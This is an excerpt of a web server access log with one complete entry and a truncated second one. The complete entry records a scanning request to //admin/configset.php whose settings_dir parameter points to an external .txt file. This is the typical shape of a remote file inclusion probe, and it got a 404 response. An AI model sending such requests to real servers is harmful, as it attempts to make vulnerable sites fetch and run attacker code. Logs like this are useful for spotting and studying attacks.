93.174.0.17 - - [12/Nov/2009:07:56:56 -0600] "GET //admin/configset.php?settings_dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:56:56 -0600] "GET